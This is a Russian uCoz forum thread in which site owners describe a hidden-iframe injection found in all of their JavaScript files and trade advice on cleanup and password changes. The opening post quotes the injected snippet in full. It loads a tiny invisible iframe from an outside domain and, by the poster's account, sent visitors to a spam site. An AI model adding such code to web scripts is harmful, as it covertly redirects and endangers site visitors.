Чат сообщества
|
   |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Внезапно появился Iframe во всех js-файлах (я один такой счастливчик?) |
| Внезапно появился Iframe во всех js-файлах |
|
Сразу прошу прощения за создание отдельной темы. Модераторы, не переносите сразу, может у кого-то похожая проблема.
Сегодня гугл повесил предупреждение на сайт, сразу пошел искать вирусный код. С помощью одного полезного сайта, выяснил, что вирус кроется в моих js-файлах. Сайт довольно старый, поэтому этих файлов там накопилось штук 30 - некоторые в папках третьего уровня, которые я сам-то не сразу нашел. Но во всех этих скриптах была такая приписка: Code /*d1752c*/ (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})(); /*/d1752c*/ Которая перекидывала пользователей на сайт с виагрой. Повторюсь - во всех, без исключения файлах, был вредоносный код. То есть, его прописывали не вручную, а с помощью какой-то программы. И срабатывал он не всегда, а лишь в 5% случаев. Разумеется, у меня возник вопрос - каким боком вирус попал в скрипты? Меня взломали? Или это новая уязвимость в безопасности? Может у кого-то есть похожая проблема, поиск по гуглу вывел множество сайтов с похожим кодом, и на каждом висит предупреждение: "Этот сайт содержит вредоносный код". Еще раз извиняюсь за отдельную тему, просто интересно общественное мнение, по этому вопросу. P.S Все пароли поменял, думаю сменить почту на всякий случай. Сообщение отредактировал serega1885 - Воскресенье, 04 Ноя 2012, 02:24:29
|
|
Quote (Dolor) Посмотрите Лог действий в ПУ. Посмотрел логи за последний месяц, все действия с моего IP, под моим логином. То есть, черз админку эти вирусы никто не прописывал. Тогда как они появились? Забыл сказать, что у меня имеется антивирус - лицензия Касперского, сроком на 1 год. Регулярно провожу проверку и обновления. |
|
serega1885,
Quote каким боком вирус попал в скрипты? Меня взломали? Или это новая уязвимость в безопасности? если у вас на сайте есть ещё администраторы, модераторы и остальные с доступом к админ бару и фм, то берите интервью у них или ищите утечку там. не давайте никому доступ к фм и сделайте жесткий пароль на фтп (его можно не запоминать), просто перед каждым использованием ставить длинную и страшную комбинацию циферь и буков смените пароли везде и если есть отберите доступ у всех |
|
Здравствуйте, Webanet. В том то и дело, что доступ к админ-панели только у меня. И даже если злоумышленник получил его, то зачем ему менять все ява-скрипты. Их найти-то очень сложно на сайте, некоторые содержаться среди десятков картинок, в папках третьего уровня вложенности. Ну, и Лог безопасности говорит о том, что в админку никто не заходил.
Также, я отметаю вариант с ФТП-доступом, т.к. зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата). Загрузить вредоносные файлы я не мог, т.к. составлял некоторые js самостоятельно, и точно уверен, что iframe там не было. Опираясь на все эти доводы, я склонен считать, что хакер каким-то образом нашел возможность редактировать файлы, без права доступа. Проще говоря - уязвимость. Хотя, я могу и ошибаться. |
|
serega1885,
Quote т.к. зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата). Quote Опираясь на все эти доводы, я склонен считать, что хакер каким-то образом нашел возможность редактировать файлы, без права доступа. Проще говоря - уязвимость. Хотя, я могу и ошибаться. об остальном без образцов скриптов и адреса сайта говорить сложно |
|
serega1885,
Quote зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата). |
|
Цитата (serega1885) И даже если злоумышленник получил его, то зачем ему менять все ява-скрипты. Их найти-то очень сложно на сайте, некоторые содержаться среди десятков картинок, в папках третьего уровня вложенности. Дописать во все файлы по маске *.js вредоносный префикс и всё. Absit invidia verbo
|
|
Ребята...! Помогите..!!! пожалуйста..! обнаружить скрипт, который вредоносные коды в джава файлы подружает
Яндекс пометил мой сайт как вредоносный и угрожающий для посетителей... http://d-stud.ru/  |
|
Airy, вы уже очищали сайт? смените фтп пароль. поставьте сложный и смените uid пароль
|
|
Airy, если не очищали, выявить на какой именно странице Яндекс заметил скрипт с Iframe можно через Я.Вебмастер.
Absit invidia verbo
|
|
webanet, да, коды поразному удаляли... с джава файлов, но они заново появляются.. попробую поменять пароль опять...
Вансан, яндекс вебмастер раздел безопасности пишет: 19.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO 27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO 27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO 27.05.2013 http://d-stud.ru/index....remont1 Поведенческий анализ 27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO указывает на одну и ту же страницу, но что там не так - я не понимаю... |
|
Airy, сейчас все чисто. меняйте пароли
на указанных страницах пример http://d-stud.ru/index/remont_pod_kluch/0-115 сейчас только ошибки кода. на всех по две головы. |
| |||
| |||